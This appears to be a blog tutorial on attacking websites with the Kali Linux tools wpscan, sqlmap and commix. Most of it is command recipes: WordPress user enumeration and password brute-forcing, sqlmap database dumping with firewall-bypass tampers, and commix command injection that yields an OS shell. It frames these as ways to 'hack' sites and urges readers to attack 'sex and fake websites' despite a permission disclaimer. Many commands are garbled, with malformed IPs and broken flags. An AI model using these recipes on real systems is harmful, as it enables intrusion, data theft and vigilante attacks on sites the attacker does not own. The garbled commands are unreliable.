We know that website hacking is the main part of hacking. It is important as system hacking is important. Many tools of kali Linux are used for website hacking for example wfuzz, Sparta, legion, hydra, medusa, Ncrack etc. These are used in brute force attack. But some tools are mainly used for website hacking only like sqlmap, commix, wpscan etc. These are widely used in website hacking. So in this post we will discuss in detail about these tools for website hacking.
But question is that why website hacking is important? Answer is that mostly internet is managed by websites and black hat hackers can destroy them for wrong purposes. So white hat hackers learn website hacking. They find vulnerabilities and fix them to secure websites. Some data about a user may be needed that we can find from a website. So we hack a websites to find the data about the person. We can access a victim by hacking websites that victim visits mostly. So there may be many purposes of website hacking.
But a hacker must take care and he/she should not hack any website without permission, because it can cause problem for hackers and he/she can be arrest. But every hacker must hack sex and fake websites to save the world from bad thing.
a) WPSCAN:
Wpscan stands for “word press scanner. It is very powerful tool of kali Linux that is used to scan and hack the websites that are running on word press. We can find vulnerabilities word press website by wpscan and also we can perform the brute force attack on (username) and (password) these word press website by wpscan. A hacker must learn it. It is mostly pre-installed kali Linux. So a hacker can use it directly. Now we will discuss the main commands of wpscan to use it.
TO SEE ALL OPTION OF WPSCAN:
(wpscan --help)
TO UPDATE THE WPSCAN:
(wpscan --update)
TO FIND (USERNAME), VULNERABLE PLUGIN, VULNERABLE THEMES OF WEBSITE OF WORD PRESS:
(wpscan -u + link of website or ip address -e u vp vt) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u vp vt)
TO BYPASS THE YES AND NO OPTIONS DURING SCANNING:
(wpscan -u + link or ip of website -e u vp vt --batch) e.g. (wpscan -u
https://192.168.1.8/wordpress/ -e u vp vt --batch)
TO BYPASS THE USER AGENT, SSL CERTIFICATE CHECKING DURING SCANNING:
(wpscan -u + link of website or ip address -e u vp vt -r --disable-tls-checks) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u vp vt -r --disable-tls-checks)
TO SET CONNECTION TIME BETWEEN TWO REQUESTS, TIME DELAY AND THREADS OR NUMBER OF ATTACKS PER TIME DURING SCANNING:
(wpscan -u + link of website or ip address -e u vp vt -Request-timeout+ Time --connect-timeout + Time -t + threads --max-threads + maximum threads) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u vp vt –request-timeout 5 --connect-timeout -5 -t 4 --max-threads 6)
TO SEE DETAIL OUTPUT SCANNING:
(wpscan -u + link of website or ip address -e u vp vt -v) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u vp vt -v)
I know, I discussed multiple options in single command but it is best way, you must use commands as it is with multiple options for bypassing for easy and smooth scanning.
BRUTE FORCE ATTACK ON A WORDPRESS WEBSITE BY WPSCAN:
Wpscan is main for word press website by which we can scan and brute force them, now I will discuss you a single and powerful command with you to brute force on a word press website.
(wpscan -u link of word press website --wordlist + path of wordlist to find password--username + username of website found during scanning -r --disable-tls-checks --requests-timeout + Time --connect-timeout + Time -t + threads --max-threads + number of maximum threads -v --batch) e.g.
(wpscan -u http://192.168.1.8.1/wordpress/ --wordlist /usr/shre/wordlists/rockyou.txt username admin -r --disable-tls-checks --request-timeout 4 --connect-timeout 4 -t 5 --max-threads 7 -v --batch)
As you will run this command password will found and you can use to (login) to your target word-press website. So, best of luck for wpscan to hack word press websites.
Username and password of target web found in WPscan
b) SQLMAP:
Sqlmap is a tool of kali Linux that is used to discover the sql injection vulnerability in a website and also used to hack this website using sql injection. It is used to attack the database of a website and to steal the useful information of website, like stored username and password, important file etc. It is a powerful hacking tool a hacker must learn it.
Now we will discuss about the basic terms related to sqlmap and sql injection.
1) SQL INJECTION:
Sql injection is a technique to destroy the stored database of a website. It is a common vulnerability in a website, and used to hack a website.
TYPES OF SQL INJECTION:
There are three main types of sql injection.
2) IN-BAND SQL INJECTION:
It has further two types.
A) ERROR-BASED SQL INJECTION:
It
is type of in-band sql injection in which when we do any changing with a
parameter like (GET) in the form of ( )
as (GET) or (GET) or (GET) then we get the access to database of website. By changing
parameter if error is generated then it means there is sql vulnerability.
B) UNION-BASED SQL INJECTION:
In this type of in-band sql injection we combine two queries or values
or request during attack and we can get access to a website.
3) INFERENTIAL SQL INJECTION:
In this we will discuss blind sql injection:
A) BLIND SQL INJECTION:
It is type of sql injection in which when we change any parameter then we cloud not see the errors or outputs in website. There are further two types of blind sql injection.
a) BLIND-BOOLEAN BASED SQL INJECTION:
In
this we will run different Boolean queries or conditions as AND 1 = 1 AND a = a
etc. and if website did not work properly due to these queries then it means
that website. Has blind sql injection vulnerability.
b) BLIND-TIME-BASED SQL INJECTION:
in this we apply a time as (sleep (5)#) and if website reloads after our given
specific time as 5 seconds then it means website is vulnerable for
blind-time-based sql injection.
4) OUT-OF-BAND
SQL INJECTION:
It is a not common sql injection vulnerability and it works when specific
functions are enable in website.
Method to perform sql injection there are five steps to perform sql injection attack on a website. First of all we understand the working of website on which we are attacking like its login page working.
Then we discover the specific vulnerable parameters like get, post etc. to perform sql injection attack.
In third step we discover different errors in different parameters.
Then we solve the different error in a parameter.
In last and fifth step we attack and access the database of website using sqlmap in kali Linux. You can find vulnerable parameters by sqlmap.
Now we will discuss different main commands of sqlmap to access the database of website and to find the vulnerable parameters.
TO SEE ALL OPTION OF SQLMAP:
(sqlmap -h)
TO FIND THE SQL VULNERABLE LINK OF ANY WEBSITE:
(sqlmap -u + main link of website --crawl + depth level --batch) e.g. (sqlmap -u http://vulhub.com/ --crawl 4 --batch)
TO FIND THE SQL INJECTION VULNERABILITY MORE FAST AND FORCEFULLY:
(sqlmap -u + link of website --crawl + depth level --risk=’no’--level = ‘no: --threads + ‘no’ -v + any no --batch) e.g. (sqlmap -u http://vulhub.com/ --crawl 4 -risk=3 --level=5 --threads 10 -v 4 --batch)
After running this command sqlmap will provide you a file in give directory as shown in figure. In this directory sql injection vulnerable or URL will be saved.
TO SCAN WEBSITE SAVED IN A FILE:
(sqlmap -m + path of file --crawl + depth level --batch) e.g. (sqlmap -m /root/Desktop/sql.txt/ --crawl 4 --batch)
TO USE SPECIFIC TECHNIQUE TO FIND SQL INJECTION VULNERABILITY:
(sqlmap -u + main link of website --crawl + no. --technique= “technique” --batch) e.g. (sqlmap -u http://vulhub.com/ --crawl 4 --technique= “U” --batch)
You can use “B”, “E” and “O” etc. instead of “U” actually these are types of sql injection as “B” for (blind) “E” for (error) etc.
TO BYPASS THE FIREWALL DURING SCANNING FOR VULNERABILITY:
(sqlmap -u + main link of website --crawl + no. --headers= “any header” --user-agent= “any user agent --tamper= any tamper -v + any number --batch) e.g. (sqlmap -u http://vulnweb.com/ --crawl --headers = “Referer : abc.com” --user-agent= “GEKO_Chrome” --tamper= encodebase64 -v 4 --batch)
TO USE USER AGENTS OF MOBILES TO BYPASS THE FIREWALL:
(sqlmap -u + main link of website --crawl + depth level --mobile -v + any number --batch) e.g.
(sqlmap -u http://vulhub.com/ --crawl 4 --mobile -v 4 --batch)
Then select your mobile as type (1) for (apple IPhone user agent)
TO ACCESS DATABASE OF A WEBSITE:
(sqlmap -u + vulnerable link copied from file after crawling -dbs --batch) e.g. (sqlmap -u
http://vulnweb.com/ php.id=1 --dbs --batch)
TO BYPASS THE FIREWALL DURING ACCESSING DATABASE:
(sqlmap -u + vulnerable link -dbs --headers= “any header” --user-agent= “any user agent --tamper= any tamper --batch) e.g. (sqlmap -u http://vulnweb.com/ php.id=1 --dbs --headers = “Referer : abc.com” --user-agent= “GEKO_Chrome” --tamper= encodebase64 --batch)
TO SEE THE CURRENT USER, CURRENT DATABASE AND CURRENT HOST NAME OF VULNERABLE WEBSITE:
(sqlmap -u + vulnerable link --current-user --current-dbs --hostname --headers= “any header” --user-agent= “any user agent --tamper= any tamper --batch) e.g. (sqlmap -u http://vulnweb.com/ php.id=1 –current-user –current-db --hostname --headers = “Referer : abc.com” --user-agent= “GEKO_Chrome” --tamper= encodebase64 --batch)
TO SEE THE TABLES OF SPECIFIC DATABASE OF WEBSITE:
(sqlmap -u vulnerable link -D + any database --tables --batch) e.g. (sqlmap -u http://vulnweb.com/ php.id=1 -D acuart --tables --batch)
TO SEE DETAIL OF A TABLE OF A SPECIFIC DATABASE:
(sqlmap -u + vulnerable link -D + any database -T + specific table --dump --batch) e.g. (sqlmap -u http://vulnweb.com/php.id=1 -D acuart -T users --dump --batch)
TO SEE THE ALL DATA OF A DATABASE:
(sqlmap -u + vulnerable link -D + any database -T + specific table --dump-all --batch) e.g.
(sqlmap -u http://vulnweb.com/php.id=1 -D acuart -T users –dump-all --batch)
Database found in sqlmap
So, these were some basic and important commands of sqlmap. In the database of website useful information like username, password, Coding, important files may be stored that you can use to access the specific website easily. You must use the different options like –headers, --user-agent –tamper etc. to bypass the firewall with each command of sqlmap during accessing database of website. Sql injection is not allowed but you must use sqlmap to destroy fake and sex website. So good luck for sqlmap.
c) COMMIX:
Commix stands for “command injection exploiter” it is a very powerful tool of kali Linux that is used to exploit the command injection vulnerability. When we find the command injection vulnerable link during a scanning website then we can access the website using commix.
When we provide the command injection vulnerable link to commix, then commix provide us a (reverse command shell) or (terminal). Then we can run all commands and access the target website files, folder, usernames, password and other data of website. So in this way commix is very dangerous tool of kali Linux and a hacker must learn it deeply. It is mostly pre-install in kali Linux, so we can use it directly.
Now we will discuss the main commands of commix to exploit command injection vulnerability.
TO SE ALL OPTION OF COMMIX:
(commix -h)
TO EXPLOIT COMMAND INJECTION VULNERABILITY:
(commix -u + ‘link of website’ --cookie = “cookie of website + PHPSESSID =+id of website” --data= “vulnerable parameter for command injection” --batch) e.g.
(commix -u ‘http://192.16.1.8. 129/dvwa/vulnerabilities/exec/’ --cookie= “security=low: PHPSESSID =cb1868f0c5e16fda3243f4c56f836228” --data = “ip = INJECT_HERE & submit=submit” --batch)
IMPORTANT NOTE:
You can find cookie PHPSESSID and vulnerable parameters using burp suit in your kali Linux. Open your burp suit, click on (proxy) then click on (intercept is off) to (on) the intercept. Open your website and enter wrong username or password and any other thing in parameter that is vulnerable and request will capture with all detail you need. You must (replace) your (entered thing) in command injection vulnerable parameter with (INJECT_HERE) in commix command. You must follow these things while using commix. You can also use other ways if you know about command injection vulnerability.
TO SET ENCODED ATTACK AND TO BYPASS FIREWALL:
(commix -u + ‘link of website’ --cookie = “cookie of website + PHPSESSID =+id of website” --data= “vulnerable parameter” --codec + ‘encoding’= --skip -heuristics --batch) e.g.
(commix -u ‘http://192.16.1.8. 129/vulnweb /vulnerabilities/exec/’ --cookie= “security=low: PHPSESSID =cb14fbt468394” puxzy48687” --data = “ip = INJECT_HERE & submit=submit”--codec= ‘ascii’ --skip-heuristics --batch)
Reverse shell in commix
TO SET RANDOM USER AGENT, IGNORE ERROR CODE, SSL FORCE, IGNORE REDIRECTIONS, TIMEOUT, NUMBER OF RETRIES, IGNORE SET COOKIES TO BYPASS FIREWALL:
(commix
-u + ‘link of website’ --cookie = “cookie of website + PHPSESSID =+id of
website” --data= “vulnerable parameter” --random-agent --ignore-code=+ error
code to ignore --force-ssl --ignore-redirects --timeout =+time --retries= +
number of retries per attack --drop-set-cookie
--batch) e.g.
(commix -u ‘http://192.16.1.8. 129/dvwa /exec/’ --cookie= “security=low: PHPSESSID =cb132f4b8972”xypq12rt3” --data = “ip = INJECT_HERE & submit=submit --random-agent --ignore-code= 403 --force-ssl --ignore-redirects --timeout=20 --retries=5 --drop-set-cookie as --batch)
TO SET, A TIME DELAY BETWEEN TWO REQUESTS, TIME FOR OS RESPONSE, ATTACK LEVEL, SKIP CALCULATIONS, SKIP EMPTY PARAMETERS, SKIP FIREWALL, SHOW MOBILE FOR ATTACK, SHOW OFFLINE MODE, TO BYPASS THE FIREWALL FOR POWERFUL ATTACK:
(commix -u + ‘link of website’ --cookie = “cookie of website + PHPSESSID =+id of website” --data= “vulnerable parameter for attack” --delay=+ time for delay --time-sec= + time for response --level= + attack level --skip-calc --skip-empty --skip-waf --mobile --offline --batch) e.g.
(commix -u ‘http://192.16.1.8. 129/vulnweb/exec/’ --cookie= “security=low: PHPSESSID =cb1f2tx3f4b5n6l158ibk” --data = “ip = INJECT_HERE & submit=submit --delay =5 --time-sec=5-level=2 --skip-calc --skip-empty --skip-waf --mobile --offline --batch)
As you will run these commands, then commix will give you a terminal or OS shell access and you can run the any command as (username -r -a) to see the details of operating system, (whoami) to see user of operating system, etc. it means you will get complete access of operating system on which your target website will be running. So in this way commix is very (dangerous tool) of kali Linux to hack. But you should use vulnerable parameters and correct commands to access.
Here, I will discussed some main commands of commix to exploit command injection vulnerabilities in website. You can use multiple options in your commands for effective attack but you must use important options only. And another important thing is that it is not allowed to attack a website by any tool. So, you must use it for ethical purpose only. So best of luck for commix.